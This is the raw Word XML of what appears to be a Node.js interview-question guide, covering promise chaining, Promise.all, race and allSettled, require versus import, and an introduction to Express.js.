    <w:p w14:paraId="434D2237"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fetchData = (url) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012669E2"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new Promise((resolve, reject) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B8A4AC"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setTimeout(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B921C58"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(url === 'valid-url') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F565AAD"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resolve('Data from ' + url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE15852"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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4606017A"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reject('Invalid URL');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F738E4B"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F26BF71"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1000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8B36FB"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3C9085D"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22528EB6"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4399510"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fetchData('valid-url')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40186273"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.then(data =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0285B53D"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console.log(data); // "Data from valid-url"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E86A85F"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fetchData('another-valid-url');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF61BBA"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292AFE5"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.then(data =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0072D1D1"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console.log(data); // "Data from another-valid-url"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE7E883"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fetchData('yet-another-valid-url');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECFBC2A"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2725CA4"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.then(data =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0858E110"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console.log(data); // "Data from yet-another-valid-url"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BEE25A"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9FE71BC"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.catch(error =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715E075F"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console.error('Error:', error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4DABB1"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21C07999" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7005A351" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="650"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Each then returns a new promise, which can be chained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2357583C" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="650"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The result of each promise is passed to the next then in the chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E0A85F" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="650"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>If any promise in the chain is rejected, the subsequent then methods are skipped, and the catch method is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA835A8" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Handling Multiple Promises</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091F2C27" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Node.js provides methods to handle multiple promises simultaneously:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BED778A" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="651"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Promise.all(iterable)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300F926B" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="651"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Takes an array (or any iterable) of promises and returns a single promise that resolves when all the promises in the array have resolved, or rejects as soon as one of the promises rejects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6070EFEE" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="651"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212383E0"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Promise.all([promise1, promise2, promise3])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A86F626"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.then(results =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569DFE79"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console.log(results); // An array of results from each promise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06384CAA"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8E1CE08"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.catch(error =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A9CC31"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console.error('One of the promises failed:', error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120B51FD"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75516BF" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="651"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Promise.race(iterable)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7656944C" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="651"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Returns a promise that resolves or rejects as soon as one of the promises in the iterable resolves or rejects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72840B90" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="651"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637A19DF"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Promise.race([promise1, promise2, promise3])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3F5FB2"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.then(result =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404707C8"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console.log('First resolved promise:', result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00024E84"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38ABCAC"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.catch(error =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C74FE75"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console.error('First rejected promise:', error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F52AC64"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41AC42A8" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="651"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Promise.allSettled(iterable)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08860811" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="651"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Returns a promise that resolves when all the promises in the iterable have settled (either resolved or rejected), with an array of objects that each describe the outcome of each promise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F03045" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="651"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC5812D"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Promise.allSettled([promise1, promise2, promise3])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F99E7A"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.then(results =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31415D00"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results.forEach(result =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3399A90F"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console.log(result.status); // "fulfilled" or "rejected"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F7790C"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8EB779C" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1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4D04F4E" w14:textId="77777777" w:rsidR="00070B1F" w:rsidRPr="00DA2F32" w:rsidRDefault="00070B1F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E898386"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6" w:name="_Toc178383189"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q6. What is the difference between synchronous and asynchronous programming in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="3C87703D"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7" w:name="_Toc178383190"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q7. What is a module in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="24E05DF4" w14:textId="28083784" w:rsidR="00D72CFC" w:rsidRPr="00DA2F32" w:rsidRDefault="00E40D14" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc178383191"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q8. What is the difference between require and import statements in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="4E8117C1" w14:textId="77777777" w:rsidR="00D72CFC" w:rsidRPr="00DA2F32" w:rsidRDefault="00D72CFC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This simple image will help to you understand the differences between require and import.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49793735" w14:textId="6C6BA589" w:rsidR="00D72CFC" w:rsidRPr="00DA2F32" w:rsidRDefault="00D72CFC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B34D51C" wp14:editId="0232A835">
            <wp:extent cx="4434840" cy="1028700"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="1652529779" name="Picture 2"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840" cy="1028700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A47BBE7" w14:textId="77777777" w:rsidR="00D72CFC" w:rsidRPr="00DA2F32" w:rsidRDefault="00D72CFC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Apart from that,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0069FB" w14:textId="77777777" w:rsidR="00D72CFC" w:rsidRPr="00DA2F32" w:rsidRDefault="00D72CFC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>You </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>can't</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> selectively load only the pieces you need with require but with import, you can selectively load only the pieces you need, which can save memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EE8C96" w14:textId="77777777" w:rsidR="00D72CFC" w:rsidRPr="00DA2F32" w:rsidRDefault="00D72CFC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Loading is </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>synchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(step by step) for require on the other hand import can be asynchronous(without waiting for previous import) so it </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>can perform a little better than</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> require</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273FAA3D" w14:textId="77777777" w:rsidR="00D72CFC" w:rsidRPr="00DA2F32" w:rsidRDefault="00D72CFC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AED1A5A"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9" w:name="_Toc178383192"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Q9. What is Express.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="00842C0C"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Express.js is a minimalist, unopinionated web framework for Node.js, designed to build web applications and APIs. It provides a robust set of features to develop both web and mobile applications, making it one of the most popular frameworks in the Node.js ecosystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699A6940"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Key Features of Express.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C4B27C" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="652"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Minimalist</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Express.js is designed to be lightweight, providing only the essential features needed to build a web server, with the flexibility to add more features via middleware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C003C7B" w14:textId="77777777" w:rsidR="00CE7300" w:rsidRPr="00DA2F32" w:rsidRDefault="00CE7300" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="652"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
